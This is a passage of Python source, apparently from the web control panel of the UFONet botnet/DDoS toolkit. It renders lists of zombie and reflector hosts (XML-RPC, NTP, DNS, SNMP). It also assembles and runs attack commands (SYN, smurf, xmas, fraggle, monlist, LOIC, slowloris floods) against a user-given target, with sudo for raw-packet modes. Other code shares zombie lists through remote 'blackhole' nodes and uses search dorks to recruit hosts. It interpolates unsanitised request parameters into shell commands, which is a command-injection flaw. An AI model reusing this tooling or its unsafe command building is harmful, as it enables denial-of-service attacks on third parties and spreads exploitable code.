<u>"+time.ctime(os.path.getctime(self.aliens_file))+"</u></td></tr><tr><td>"+'\n'.join(self.list_aliens)+"</td><td></h3>"+'\n'.join(self.aliens)+"</td></tr></table><br /><table border='1' cellpadding='10' cellspacing='10'><tr><td><h3><u>Droids:</u> <b>"+self.num_droids+"</b></td><td>Last update: <u>"+time.ctime(os.path.getctime(self.droids_file))+"</u></td></tr><tr><td>"+'\n'.join(self.list_droids)+"</td><td></h3>"+'\n'.join(self.droids)+"</td></tr></table><br /><table border='1' cellpadding='10' cellspacing='10'><tr><td><h3><u>Zombies:</u> <b>"+self.num_zombies+"</b></td><td>Last update: <u>"+time.ctime(os.path.getctime(self.zombies_file))+"</u></td></tr><tr><td>"+'\n'.join(self.list_zombies)+"</td><td></h3>"+'\n'.join(self.zombies)+"</td></tr></table><br /><table border='1' cellpadding='10' cellspacing='10'><tr><td><h3><u>XML-RPCs:</u> <b>"+self.num_rpcs+"</b></td><td>Last update: <u>"+time.ctime(os.path.getctime(self.rpcs_file))+"</u></td></tr><tr><td>"+'\n'.join(self.list_rpcs)+"</td><td></h3>"+'\n'.join(self.rpcs)+"</td></tr></table><br /><table border='1' cellpadding='10' cellspacing='10'><tr><td><h3><u>NTPs:</u> <b>"+self.num_ntps+"</b></td><td>Last update: <u>"+time.ctime(os.path.getctime(self.ntps_file))+"</u></td></tr><tr><td>"+'\n'.join(self.list_ntps)+"</td><td></h3>"+'\n'.join(self.ntps)+"</td></tr></table><br /><table border='1' cellpadding='10' cellspacing='10'><tr><td><h3><u>DNSs:</u> <b>"+self.num_dnss+"</b></td><td>Last update: <u>"+time.ctime(os.path.getctime(self.dnss_file))+"</u></td></tr><tr><td>"+'\n'.join(self.list_dnss)+"</td><td></h3>"+'\n'.join(self.dnss)+"</td></tr></table><br /><table border='1' cellpadding='10' cellspacing='10'><tr><td><h3><u>SNMPs:</u> <b>"+self.num_snmps+"</b></td><td>Last update: <u>"+time.ctime(os.path.getctime(self.snmps_file))+"</u></td></tr><tr><td>"+'\n'.join(self.list_snmps)+"</td><td></h3>"+'\n'.join(self.snmps)+"</td></tr></table><br /><br/>"
  3716. if page == "/cmd_list_zombies":
  3717. self.pages["/cmd_list_zombies"] = "<pre><h1>Total Zombies = "+self.num_zombies+"</h1><br /><table border='1' cellpadding='10' cellspacing='10'><tr><td><h3><u>Zombies:</u> <b>"+self.num_zombies+"</b></td><td>Last update: <u>"+time.ctime(os.path.getctime(self.zombies_file))+"</u></td></tr><tr><td>"+'\n'.join(self.list_zombies)+"</td><td></h3>"+'\n'.join(self.zombies)+"</td></tr></table><br /><br/>"
  3718. if page == "/cmd_list_aliens":
  3719. self.pages["/cmd_list_aliens"] = "<pre><h1>Total Aliens = "+self.num_aliens+"</h1><br /><table border='1' cellpadding='10' cellspacing='10'><tr><td><h3><u>Aliens:</u> <b>"+self.num_aliens+"</b></td><td>Last update: <u>"+time.ctime(os.path.getctime(self.aliens_file))+"</u></td></tr><tr><td>"+'\n'.join(self.list_aliens)+"</td><td></h3>"+'\n'.join(self.aliens)+"</td></tr></table><br /><br/>"
  3720. if page == "/cmd_list_droids":
  3721. self.pages["/cmd_list_droids"] = "<pre><h1>Total Droids = "+self.num_droids+"</h1><br /><table border='1' cellpadding='10' cellspacing='10'><tr><td><h3><u>Droids:</u> <b>"+self.num_droids+"</b></td><td>Last update: <u>"+time.ctime(os.path.getctime(self.droids_file))+"</u></td></tr><tr><td>"+'\n'.join(self.list_droids)+"</td><td></h3>"+'\n'.join(self.droids)+"</td></tr></table><br /><br/>"
  3722. if page == "/cmd_list_ucavs":
  3723. self.pages["/cmd_list_ucavs"] = "<pre><h1>Total UCAVs = "+self.num_ucavs+"</h1><br /><table border='1' cellpadding='10' cellspacing='10'><tr><td><h3><u>UCAVs:</u> <b>"+self.num_ucavs+"</b></td><td>Last update: <u>"+time.ctime(os.path.getctime(self.ucavs_file))+"</u></td></tr><tr><td>"+'\n'.join(self.list_ucavs)+"</td><td></h3>"+'\n'.join(self.ucavs)+"</td></tr></table><br /><br/>"
  3724. if page == "/cmd_list_rpcs":
  3725. self.pages["/cmd_list_rpcs"] = "<pre><h1>Total XML-RPCs = "+self.num_rpcs+"</h1><br /><table border='1' cellpadding='10' cellspacing='10'><tr><td><h3><u>XML-RPCs:</u> <b>"+self.num_rpcs+"</b></td><td>Last update: <u>"+time.ctime(os.path.getctime(self.rpcs_file))+"</u></td></tr><tr><td>"+'\n'.join(self.list_rpcs)+"</td><td></h3>"+'\n'.join(self.rpcs)+"</td></tr></table><br /><br/>"
  3726. if page == "/cmd_list_ntps":
  3727. self.pages["/cmd_list_ntps"] = "<pre><h1>Total NTPs = "+self.num_ntps+"</h1><br /><table border='1' cellpadding='10' cellspacing='10'><tr><td><h3><u>NTPs:</u> <b>"+self.num_ntps+"</b></td><td>Last update: <u>"+time.ctime(os.path.getctime(self.ntps_file))+"</u></td></tr><tr><td>"+'\n'.join(self.list_ntps)+"</td><td></h3>"+'\n'.join(self.ntps)+"</td></tr></table><br /><br/>"
  3728. if page == "/cmd_list_dnss":
  3729. self.pages["/cmd_list_dnss"] = "<pre><h1>Total DNSs = "+self.num_dnss+"</h1><br /><table border='1' cellpadding='10' cellspacing='10'><tr><td><h3><u>DNSs:</u> <b>"+self.num_dnss+"</b></td><td>Last update: <u>"+time.ctime(os.path.getctime(self.dnss_file))+"</u></td></tr><tr><td>"+'\n'.join(self.list_dnss)+"</td><td></h3>"+'\n'.join(self.dnss)+"</td></tr></table><br /><br/>"
  3730. if page == "/cmd_list_snmps":
  3731. self.pages["/cmd_list_snmps"] = "<pre><h1>Total SNMPs = "+self.num_snmps+"</h1><br /><table border='1' cellpadding='10' cellspacing='10'><tr><td><h3><u>SNMPs:</u> <b>"+self.num_snmps+"</b></td><td>Last update: <u>"+time.ctime(os.path.getctime(self.snmps_file))+"</u></td></tr><tr><td>"+'\n'.join(self.list_snmps)+"</td><td></h3>"+'\n'.join(self.snmps)+"</td></tr></table><br /><br/>"
  3732. if page == "/cmd_view_army":
  3733. if pGet=={}:
  3734. self.pages["/cmd_view_army"] = self.html_army_map()
  3735. if page == "/cmd_view_attack":
  3736. if 'target' in list(pGet.keys()) != None:
  3737. self.pages["/cmd_view_attack"] = self.html_army_map(pGet['target'])
  3738. if page == "/cmd_test_army":
  3739. self.pages["/cmd_test_army"] = "<pre>Waiting for testing results...</pre>"
  3740. runcmd = "("+python_version+" -i ufonet -t " + self.zombies_file + " " + cmd_options + "|tee /tmp/out) &"
  3741. if page == "/cmd_test_all":
  3742. self.pages["/cmd_test_all"] = "<pre>Waiting for testing results...</pre>"
  3743. runcmd = "("+python_version+" -i ufonet --test-all " + cmd_options + "|tee /tmp/out) &"
  3744. if page == "/cmd_test_offline":
  3745. self.pages["/cmd_test_offline"] = "<pre>Waiting for testing results...</pre>"
  3746. runcmd = "("+python_version+" -i ufonet --test-offline " + cmd_options + "|tee /tmp/out) &"
  3747. if page == "/cmd_attack_me":
  3748. self.pages["/cmd_attack_me"] = "<pre>Waiting for 'attack-me' results...</pre>"
  3749. runcmd = "("+python_version+" -i ufonet --attack-me " + cmd_options + "|tee /tmp/out) &"
  3750. if page == "/cmd_attack_me_update":
  3751. if not os.path.exists('/tmp/out'):
  3752. open('/tmp/out', 'w').close()
  3753. with open('/tmp/out', 'r') as f:
  3754. self.pages["/cmd_attack_me_update"] = "<pre>"+f.read()+"<pre>"
  3755. if page == "/cmd_download_community":
  3756. self.pages["/cmd_download_community"] = "<pre>Waiting for downloading results...</pre>"
  3757. runcmd = "("+python_version+" -i ufonet --download-zombies "+ cmd_options + "|tee /tmp/out) &"
  3758. if page == "/cmd_download_community_update":
  3759. if not os.path.exists('/tmp/out'):
  3760. open('/tmp/out', 'w').close()
  3761. with open('/tmp/out', 'r') as f:
  3762. self.pages["/cmd_download_community_update"] = "<pre>"+f.read()+"<pre>"
  3763. if page == "/cmd_upload_community":
  3764. self.pages["/cmd_upload_community"] = "<pre>Waiting for uploading results...</pre>"
  3765. runcmd = "("+python_version+" -i ufonet --upload-zombies "+ cmd_options + "|tee /tmp/out) &"
  3766. if page == "/cmd_upload_community_update":
  3767. if not os.path.exists('/tmp/out'):
  3768. open('/tmp/out', 'w').close()
  3769. with open('/tmp/out', 'r') as f:
  3770. self.pages["/cmd_upload_community_update"] = "<pre>"+f.read()+"<pre>"
  3771. if page == "/cmd_test_army_update":
  3772. if not os.path.exists('/tmp/out'):
  3773. open('/tmp/out', 'w').close()
  3774. with open('/tmp/out', 'r') as f:
  3775. self.pages["/cmd_test_army_update"] = "<pre>"+f.read()+"<pre>"
  3776. if page == "/cmd_test_all_update":
  3777. if not os.path.exists('/tmp/out'):
  3778. open('/tmp/out', 'w').close()
  3779. with open('/tmp/out', 'r') as f:
  3780. self.pages["/cmd_test_all_update"] = "<pre>"+f.read()+"<pre>"
  3781. if page == "/cmd_test_offline_update":
  3782. if not os.path.exists('/tmp/out'):
  3783. open('/tmp/out', 'w').close()
  3784. with open('/tmp/out', 'r') as f:
  3785. self.pages["/cmd_test_offline_update"] = "<pre>"+f.read()+"<pre>"
  3786. if page == "/cmd_test_rpcs":
  3787. self.pages["/cmd_test_rpcs"] = "<pre>Waiting for XML-RPC testing results...</pre>"
  3788. runcmd = "("+python_version+" -i ufonet --test-rpc " + cmd_options + "|tee /tmp/out) &"
  3789. if page == "/cmd_test_rpcs_update":
  3790. if not os.path.exists('/tmp/out'):
  3791. open('/tmp/out', 'w').close()
  3792. with open('/tmp/out', 'r') as f:
  3793. self.pages["/cmd_test_rpcs_update"] = "<pre>"+f.read()+"<pre>"
  3794. if page == "/cmd_attack":
  3795. self.pages["/cmd_attack"] = "<pre>Waiting for attacking results...</pre>"
  3796. cmd = ""
  3797. flag_ufosyn = None
  3798. flag_spray = None
  3799. flag_smurf = None
  3800. flag_xmas = None
  3801. flag_nuke = None
  3802. flag_tachyon = None
  3803. flag_monlist = None
  3804. flag_fraggle = None
  3805. flag_sniper = None
  3806. flag_ufoack = None
  3807. flag_uforst = None
  3808. flag_droper = None
  3809. flag_overlap = None
  3810. flag_pinger = None
  3811. flag_ufoudp = None
  3812. nonroot_cmd = "("+python_version+" -i ufonet -a '"+pGet["target"]+"' -b '"+pGet["path"]+"' -r '"+pGet["rounds"]+"' "
  3813. root_cmd = "(sudo "+python_version+" -i ufonet -a '"+pGet["target"]+"' -b '"+pGet["path"]+"' -r '"+pGet["rounds"]+"' "
  3814. end_cmd = ""+cmd_options + "|tee /tmp/out) &"
  3815. if pGet["dbstress"]:
  3816. cmd += "--db '" +str(pGet["dbstress"])+ "' "
  3817. if pGet["loic"]:
  3818. cmd += "--loic '" +str(pGet["loic"])+ "' "
  3819. if pGet["loris"]:
  3820. cmd += "--loris '" +str(pGet["loris"])+ "' "
  3821. if pGet["ufosyn"]:
  3822. cmd += "--ufosyn '" +str(pGet["ufosyn"])+ "' "
  3823. flag_ufosyn = True
  3824. if pGet["spray"]:
  3825. cmd += "--spray '" +str(pGet["spray"])+ "' "
  3826. flag_spray = True
  3827. if pGet["smurf"]:
  3828. cmd += "--smurf '" +str(pGet["smurf"])+ "' "
  3829. flag_smurf = True
  3830. if pGet["xmas"]:
  3831. cmd += "--xmas '" +str(pGet["xmas"])+ "' "
  3832. flag_xmas = True
  3833. if pGet["nuke"]:
  3834. cmd += "--nuke '" +str(pGet["nuke"])+ "' "
  3835. flag_nuke = True
  3836. if pGet["tachyon"]:
  3837. cmd += "--tachyon '" +str(pGet["tachyon"])+ "' "
  3838. flag_tachyon = True
  3839. if pGet["monlist"]:
  3840. cmd += "--monlist '" +str(pGet["monlist"])+ "' "
  3841. flag_monlist = True
  3842. if pGet["fraggle"]:
  3843. cmd += "--fraggle '" +str(pGet["fraggle"])+ "' "
  3844. flag_fraggle = True
  3845. if pGet["sniper"]:
  3846. cmd += "--sniper '" +str(pGet["sniper"])+ "' "
  3847. flag_sniper = True
  3848. if pGet["ufoack"]:
  3849. cmd += "--ufoack '" +str(pGet["ufoack"])+ "' "
  3850. flag_ufoack = True
  3851. if pGet["uforst"]:
  3852. cmd += "--uforst '" +str(pGet["uforst"])+ "' "
  3853. flag_uforst = True
  3854. if pGet["droper"]:
  3855. cmd += "--droper '" +str(pGet["droper"])+ "' "
  3856. flag_droper = True
  3857. if pGet["overlap"]:
  3858. cmd += "--overlap '" +str(pGet["overlap"])+ "' "
  3859. flag_overlap = True
  3860. if pGet["pinger"]:
  3861. cmd += "--pinger '" +str(pGet["pinger"])+ "' "
  3862. flag_pinger = True
  3863. if pGet["ufoudp"]:
  3864. cmd += "--ufoudp '" +str(pGet["ufoudp"])+ "' "
  3865. flag_ufoudp = True
  3866. if not flag_monlist and not flag_tachyon and not flag_nuke and not flag_xmas and not flag_smurf and not flag_spray and not flag_ufosyn and not flag_fraggle and not flag_sniper and not flag_ufoack and not flag_uforst and not flag_droper and not flag_overlap and not flag_pinger and not flag_ufoudp:
  3867. cmd = nonroot_cmd + cmd # non root required (LOIC, LORIS)
  3868. if flag_ufosyn == True or flag_spray == True or flag_smurf == True or flag_xmas == True or flag_nuke == True or flag_tachyon == True or flag_monlist == True or flag_fraggle == True or flag_sniper == True or flag_ufoack == True or flag_uforst == True or flag_droper == True or flag_overlap == True or flag_pinger == True or flag_ufoudp == True:
  3869. cmd = root_cmd + cmd # root required (UFOSYN, SPRAY, SMURF, XMAS, NUKE, TACHYON, MONLIST, FRAGGLE, SNIPER, UFOACK, UFORST, DROPER, OVERLAP, PINGER, UFOUDP)
  3870. runcmd = cmd + end_cmd
  3871. if page == "/cmd_attack_update":
  3872. if not os.path.exists('/tmp/out'):
  3873. open('/tmp/out', 'w').close()
  3874. with open('/tmp/out', 'r') as f:
  3875. self.pages["/cmd_attack_update"] = "<pre>"+f.read()+"<pre>"
  3876. if page == "/cmd_inspect":
  3877. self.pages["/cmd_inspect"] = "<pre>Waiting for inspecting results...</pre>"
  3878. target = pGet["target"]
  3879. target=urllib.parse.unquote(target)
  3880. runcmd = "("+python_version+" -i ufonet -i '"+target+"' "+ cmd_options + "|tee /tmp/out) &"
  3881. if page == "/cmd_inspect_update":
  3882. if not os.path.exists('/tmp/out'):
  3883. open('/tmp/out', 'w').close()
  3884. with open('/tmp/out', 'r') as f:
  3885. self.pages["/cmd_inspect_update"] = "<pre>"+f.read()+"<pre>"
  3886. if page == "/cmd_abduction":
  3887. self.pages["/cmd_abduction"] = "<pre>Waiting for abduction results...</pre>"
  3888. target = pGet["target"]
  3889. target=urllib.parse.unquote(target)
  3890. runcmd = "("+python_version+" -i ufonet -x '"+target+"' "+ cmd_options + "|tee /tmp/out) &"
  3891. if page == "/cmd_abduction_update":
  3892. if not os.path.exists('/tmp/out'):
  3893. open('/tmp/out', 'w').close()
  3894. with open('/tmp/out', 'r') as f:
  3895. self.pages["/cmd_abduction_update"] = "<pre>"+f.read()+"<pre>"
  3896. if page == "/cmd_search":
  3897. self.pages["/cmd_search"] = "<pre>Waiting for search engines results...</pre>"
  3898. if pGet["dork_list"] == "on": # search using dork list (file: dorks.txt)
  3899. if pGet["all_engines"] == "on": # search using all search engines (and exclude those set by the user)
  3900. if pGet["exclude_engines"]:
  3901. runcmd = "("+python_version+" -i ufonet --sd 'botnet/dorks.txt' --sa '"+pGet["exclude_engines"]+"' " + cmd_options + "|tee /tmp/out) &"
  3902. else:
  3903. runcmd = "("+python_version+" -i ufonet --sd 'botnet/dorks.txt' --sa " + cmd_options + "|tee /tmp/out) &"
  3904. else: # search using a search engine
  3905. runcmd = "("+python_version+" -i ufonet --sd 'botnet/dorks.txt' --se '"+pGet["s_engine"]+"' " + cmd_options + "|tee /tmp/out) &"
  3906. else: # search using a pattern
  3907. if pGet["autosearch"] == "on": # search using auto-search mod
  3908. if pGet["exclude_engines"]:
  3909. runcmd = "("+python_version+" -i ufonet --auto-search '"+pGet["exclude_engines"]+"' " + cmd_options + "|tee /tmp/out) &"
  3910. else:
  3911. runcmd = "("+python_version+" -i ufonet --auto-search " + cmd_options + "|tee /tmp/out) &"
  3912. else:
  3913. if pGet["all_engines"] == "on": # search using all search engines
  3914. if pGet["exclude_engines"]:
  3915. runcmd = "("+python_version+" -i ufonet -s '"+pGet["dork"]+"' --sa '"+pGet["exclude_engines"]+"' " + cmd_options + "|tee /tmp/out) &"
  3916. else:
  3917. runcmd = "("+python_version+" -i ufonet -s '"+pGet["dork"]+"' --sa " + cmd_options + "|tee /tmp/out) &"
  3918. else: # search using a search engine
  3919. runcmd = "("+python_version+" -i ufonet -s '"+pGet["dork"]+"' --se '"+pGet["s_engine"]+"' " + cmd_options + "|tee /tmp/out) &"
  3920. if page == "/cmd_search_update":
  3921. if not os.path.exists('/tmp/out'):
  3922. open('/tmp/out', 'w').close()
  3923. with open('/tmp/out', 'r') as f:
  3924. self.pages["/cmd_search_update"] = "<pre>"+f.read()+"<pre>"
  3925. if page == "/cmd_refresh_blackholes":
  3926. self.pages["/cmd_refresh_blackholes"] = "<pre>Waiting for 'blackhole' reply...</pre>"
  3927. blackhole_ip = pGet["blackholes_source"]
  3928. blackhole_ip = urllib.parse.unquote(blackhole_ip)
  3929. try:
  3930. blackholes = urllib.request.urlopen('http://'+blackhole_ip+'/ufonet/nodes.dat').read().decode('utf-8')
  3931. f = open(self.blackholes, "w") # write updates to nodes.dat
  3932. f.write(blackholes)
  3933. f.close()
  3934. self.blackholes_text = blackholes
  3935. except:
  3936. blackholes = "[Error] [AI] Something wrong downloading. Try it again or using another source...\n"
  3937. end_mark = "\n[Info] [AI] End of blackholes list (nodes.dat). -> [Refreshing!]"
  3938. f = open("/tmp/out", "w")
  3939. f.write(str(blackholes))
  3940. f.write(end_mark)
  3941. f.close()
  3942. if page == "/cmd_refresh_blackholes_update":
  3943. if not os.path.exists('/tmp/out'):
  3944. open('/tmp/out', 'w').close()
  3945. with open('/tmp/out', 'r') as f:
  3946. self.pages["/cmd_refresh_blackholes_update"] = "<pre>"+f.read()+"<pre>"
  3947. if page == "/cmd_refresh_news":
  3948. self.pages["/cmd_refresh_news"] = "<pre>Waiting for 'blackhole' reply...</pre>"
  3949. blackhole_ip = pGet["news_source"]
  3950. blackhole_ip = urllib.parse.unquote(blackhole_ip)
  3951. try:
  3952. news = urllib.request.urlopen('http://'+blackhole_ip+'/ufonet/news.txt').read().decode('utf-8')
  3953. f = open(self.news, "w") # write updates to news.txt
  3954. f.write(news)
  3955. f.close()
  3956. self.news_text = news
  3957. except:
  3958. news = "[Error] [AI] Something wrong downloading. Try it again or using another source....\n"
  3959. end_mark = "\n[Info] [AI] End of news feed. -> [Refreshing!]"
  3960. f = open("/tmp/out", "w")
  3961. f.write(str(news))
  3962. f.write(end_mark)
  3963. f.close()
  3964. if page == "/cmd_refresh_news_update":
  3965. if not os.path.exists('/tmp/out'):
  3966. open('/tmp/out', 'w').close()
  3967. with open('/tmp/out', 'r') as f:
  3968. self.pages["/cmd_refresh_news_update"] = "<pre>"+f.read()+"<pre>"
  3969. if page == "/cmd_sync_wargames":
  3970. self.pages["/cmd_sync_wargames"] = "<pre>Waiting for 'blackhole' reply...</pre>"
  3971. blackhole_ip = pGet["wargames_source"]
  3972. blackhole_ip = urllib.parse.unquote(blackhole_ip)
  3973. try:
  3974. wargames = urllib.request.urlopen('http://'+blackhole_ip+'/ufonet/wargames.txt').read().decode('utf-8')
  3975. f = open(self.wargames_file, "w") # write updates to wargames.txt
  3976. f.write(wargames)
  3977. f.close()
  3978. self.wargames_text = wargames
  3979. except:
  3980. wargames = "[Error] [AI] Something wrong downloading. Try it again or using another source...\n"
  3981. end_mark = "\n[Info] [AI] End of transmission. -> [Refreshing!]"
  3982. f = open("/tmp/out", "w")
  3983. f.write(str(wargames))
  3984. f.write(end_mark)
  3985. f.close()
  3986. if page == "/cmd_sync_wargames_update":
  3987. if not os.path.exists('/tmp/out'):
  3988. open('/tmp/out', 'w').close()
  3989. with open('/tmp/out', 'r') as f:
  3990. stream = f.read()
  3991. stream = re.sub("(.{100})", "\\1\n", stream, 0, re.DOTALL) # regex magics! (set visual stream to 100 chars after \n)
  3992. self.pages["/cmd_sync_wargames_update"] = "<pre>"+stream+"<pre>"
  3993. if page == "/cmd_sync_links":
  3994. self.pages["/cmd_sync_links"] = "<pre>Waiting for 'blackhole' reply...</pre>"
  3995. blackhole_ip = pGet["link_source"]
  3996. blackhole_ip = urllib.parse.unquote(blackhole_ip)
  3997. try:
  3998. links = urllib.request.urlopen('http://'+blackhole_ip+'/ufonet/links.txt').read().decode('utf-8')
  3999. f = open(self.links_file, "w") # write updates to links.txt
  4000. f.write(links)
  4001. f.close()
  4002. self.links_text = links
  4003. except:
  4004. links = "[Error] [AI] Something wrong downloading. Try it again or using another source...\n"
  4005. end_mark = "\n[Info] [AI] End of transmission. -> [Refreshing!]"
  4006. f = open("/tmp/out", "w")
  4007. f.write(str(links))
  4008. f.write(end_mark)
  4009. f.close()
  4010. if page == "/cmd_sync_links_update":
  4011. if not os.path.exists('/tmp/out'):
  4012. open('/tmp/out', 'w').close()
  4013. with open('/tmp/out', 'r') as f:
  4014. stream = f.read()
  4015. stream = re.sub("(.{100})", "\\1\n", stream, 0, re.DOTALL) # regex magics! (set visual stream to 100 chars after \n)
  4016. self.pages["/cmd_sync_links_update"] = "<pre>"+stream+"<pre>"
  4017. if page == "/cmd_sync_globalnet":
  4018. self.pages["/cmd_sync_globalnet"] = "<pre>Waiting for 'blackhole' reply...</pre>"
  4019. blackhole_ip = pGet["globalnet_source"]
  4020. blackhole_ip = urllib.parse.unquote(blackhole_ip)
  4021. try:
  4022. globalnet = urllib.request.urlopen('http://'+blackhole_ip+'/ufonet/globalnet.txt').read().decode('utf-8')
  4023. f = open(self.globalnet_file, "w") # write updates to globalnet.txt
  4024. f.write(globalnet)
  4025. f.close()
  4026. self.globalnet_text = globalnet
  4027. except:
  4028. globalnet = "[Error] [AI] Something wrong downloading. Try it again or using another source...\n"
  4029. end_mark = "\n[Info] [AI] End of transmission. -> [Refreshing!]"
  4030. f = open("/tmp/out", "w")
  4031. f.write(str(globalnet))
  4032. f.write(end_mark)
  4033. f.close()
  4034. if page == "/cmd_sync_globalnet_update":
  4035. if not os.path.exists('/tmp/out'):
  4036. open('/tmp/out', 'w').close()
  4037. with open('/tmp/out', 'r') as f:
  4038. stream = f.read()
  4039. stream = re.sub("(.{100})", "\\1\n", stream, 0, re.DOTALL) # regex magics! (set visual stream to 100 chars after \n)
  4040. self.pages["/cmd_sync_globalnet_update"] = "<pre>"+stream+"<pre>"
  4041. if page == "/cmd_sync_streams":
  4042. self.pages["/cmd_sync_streams"] = "<pre>Waiting for 'blackhole' reply...</pre>"
  4043. blackhole_ip = pGet["stream_source"]
  4044. blackhole_ip = urllib.parse.unquote(blackhole_ip)
  4045. try:
  4046. streams = urllib.request.urlopen('http://'+blackhole_ip+'/ufonet/streams.txt').read().decode('utf-8')
  4047. f = open(self.streams_file, "w") # write updates to streams.txt
  4048. f.write(streams)
  4049. f.close()
  4050. self.streams_text = streams
  4051. except:
  4052. streams = "[Error] [AI] Something wrong downloading. Try it again or using another source...\n"
  4053. end_mark = "\n[Info] [AI] End of transmission. -> [Refreshing!]"
  4054. f = open("/tmp/out", "w")
  4055. f.write(str(streams))
  4056. f.write(end_mark)
  4057. f.close()
  4058. if page == "/cmd_sync_streams_update":
  4059. if not os.path.exists('/tmp/out'):
  4060. open('/tmp/out', 'w').close()
  4061. with open('/tmp/out', 'r') as f:
  4062. stream = f.read()
  4063. stream = re.sub("(.{100})", "\\1\n", stream, 0, re.DOTALL) # regex magics! (set visual stream to 100 chars after \n)
  4064. self.pages["/cmd_sync_streams_update"] = "<pre>"+stream+"<pre>"
  4065. if page == "/cmd_refresh_missions":
  4066. self.pages["/cmd_refresh_missions"] = "<pre>Waiting for 'blackhole' reply...</pre>"
  4067. blackhole_ip = pGet["missions_source"]
  4068. blackhole_ip = urllib.parse.unquote(blackhole_ip)
  4069. try:
  4070. missions = urllib.request.urlopen('http://'+blackhole_ip+'/ufonet/missions.txt').read().decode('utf-8')
  4071. f = open(self.missions, "w") # write updates to missions.txt
  4072. f.write(missions)
  4073. f.close()
  4074. self.missions_text = missions
  4075. except:
  4076. missions = "[Error] [AI] Something wrong downloading. Try it again or using another source...\n"
  4077. end_mark = "\n[Info] [AI] End of missions feed. -> [Refreshing!]"
  4078. f = open("/tmp/out", "w")
  4079. f.write(str(missions))
  4080. f.write(end_mark)
  4081. f.close()
  4082. if page == "/cmd_refresh_missions_update":
  4083. if not os.path.exists('/tmp/out'):
  4084. open('/tmp/out', 'w').close()
  4085. with open('/tmp/out', 'r') as f:
  4086. self.pages["/cmd_refresh_missions_update"] = "<pre>"+f.read()+"<pre>"
  4087. if page == "/cmd_refresh_ranking":
  4088. self.pages["/cmd_refresh_ranking"] = "<pre>Waiting for 'blackhole' reply...</pre>"
  4089. ranking_ip = pGet["ranking_source"]
  4090. ranking_ip = urllib.parse.unquote(ranking_ip)
  4091. try:
  4092. ranking = urllib.request.urlopen('http://'+ranking_ip+'/ufonet/grid.txt').read().decode('utf-8')
  4093. f = open(self.grid_file, "w") # write updates to grid.txt
  4094. f.write(ranking)
  4095. f.close()
  4096. self.ranking_text = ranking
  4097. except:
  4098. ranking = "[Error] [AI] Something wrong downloading. Try it again or using another source...\n"
  4099. end_mark = "\n[Info] [AI] End of ranking feed. -> [Refreshing!]"
  4100. f = open("/tmp/out", "w")
  4101. f.write(str(ranking))
  4102. f.write(end_mark)
  4103. f.close()
  4104. if page == "/cmd_refresh_ranking_update":
  4105. if not os.path.exists('/tmp/out'):
  4106. open('/tmp/out', 'w').close()
  4107. with open('/tmp/out', 'r') as f:
  4108. self.pages["/cmd_refresh_ranking_update"] = "<pre>"+f.read()+"<pre>"
  4109. if page == "/cmd_sync_grid":
  4110. self.pages["/cmd_sync_grid"] = "<pre>Waiting for 'blackhole' reply...</pre>"
  4111. blackhole_ip = pGet["grid_source"]
  4112. blackhole_ip = urllib.parse.unquote(blackhole_ip)
  4113. try:
  4114. grid = urllib.request.urlopen('http://'+blackhole_ip+'/ufonet/grid.txt').read().decode('utf-8')
  4115. f = open(self.grid_file, "w") # write updates to grid.txt
  4116. f.write(grid)
  4117. f.close()
  4118. self.grid_text = grid
  4119. except:
  4120. grid = "[Error] [AI] Something wrong downloading. Try it again or using another source...\n"
  4121. end_mark = "\n[Info] [AI] End of transmission. -> [Refreshing!]"
  4122. f = open("/tmp/out", "w")
  4123. f.write(str(grid))
  4124. f.write(end_mark)
  4125. f.close()
  4126. if page == "/cmd_sync_grid_update":
  4127. if not os.path.exists('/tmp/out'):
  4128. open('/tmp/out', 'w').close()
  4129. with open('/tmp/out', 'r') as f:
  4130. stream = f.read()
  4131. stream = re.sub("(.{100})", "\\1\n", stream, 0, re.DOTALL) # regex magics! (set visual stream to 100 chars after \n)
  4132. self.pages["/cmd_sync_grid_update"] = "<pre>"+stream+"<pre>"
  4133. if page == "/cmd_job_remove":
  4134. self.pages["/cmd_job_remove"] = "<pre>Removing wargame from your list...</pre>"
  4135. try:
  4136. job_id = pGet["id"]
  4137. except:
  4138. job_id = ""
  4139. if job_id is not "":
  4140. self.list_wargames.reverse()
  4141. try:
  4142. job_task = self.list_wargames[(int(job_id)-1)]
  4143. f = open(self.wargames_file,"r")
  4144. ls = f.readlines()
  4145. f.close()
  4146. f = open(self.wargames_file,"w")
  4147. for l in ls:
  4148. if str(l) != str(job_task):
  4149. f.write(l)
  4150. f.close()
  4151. except:
  4152. pass
  4153. if page == "/cmd_job_remove_update":
  4154. if not os.path.exists('/tmp/out'):
  4155. open('/tmp/out', 'w').close()
  4156. with open('/tmp/out', 'r') as f:
  4157. self.pages["/cmd_job_remove_update"] = "<pre>"+f.read()+"<pre>"
  4158. if page == "/cmd_job_remove_all":
  4159. self.pages["/cmd_job_remove_all"] = "<pre>Purging ALL -CLOSED- wargames from your list...</pre>"
  4160. try:
  4161. key_params = pGet["key"]
  4162. sep = ","
  4163. key = key_params.rsplit(sep, 1)[0]
  4164. except:
  4165. key = ""
  4166. if key is not "":
  4167. try:
  4168. self.list_wargames.reverse()
  4169. now = strftime("%d-%m-%Y %H:%M:%S", gmtime())
  4170. now = strptime(now, "%d-%m-%Y %H:%M:%S")
  4171. f = open(self.wargames_file,"r")
  4172. ls = f.readlines()
  4173. f.close()
  4174. f = open(self.wargames_file,"w")
  4175. sep = wargames_msg_sep
  4176. for l in ls:
  4177. job_estimated = l.rsplit(sep, 1)[1]
  4178. self.decrypt(key, job_estimated)
  4179. if self.decryptedtext:
  4180. job_estimated = self.decryptedtext
  4181. else:
  4182. job_estimated = now
  4183. self.decryptedtext = ""
  4184. job_estimated = strptime(job_estimated, "%d-%m-%Y %H:%M:%S")
  4185. if (now >= job_estimated) == False: # -ONGOING-
  4186. f.write(l)
  4187. f.close()
  4188. except:
  4189. pass
  4190. if page == "/cmd_job_remove_all_update":
  4191. if not os.path.exists('/tmp/out'):
  4192. open('/tmp/out', 'w').close()
  4193. with open('/tmp/out', 'r') as f:
  4194. self.pages["/cmd_job_remove_all_update"] = "<pre>"+f.read()+"<pre>"
  4195. if page == "/cmd_edit_supply":
  4196. self.pages["/cmd_edit_supply"] = "<pre>Changing 'Global Army Supply' configuration...</pre>"
  4197. try:
  4198. supply_botnet = pGet["botnet"]
  4199. supply_loic = pGet["loic"]
  4200. supply_loris = pGet["loris"]
  4201. supply_ufosyn = pGet["ufosyn"]
  4202. supply_spray = pGet["spray"]
  4203. supply_smurf = pGet["smurf"]
  4204. supply_xmas = pGet["xmas"]
  4205. supply_nuke = pGet["nuke"]
  4206. supply_tachyon = pGet["tachyon"]
  4207. supply_monlist = pGet["monlist"]
  4208. supply_fraggle = pGet["fraggle"]
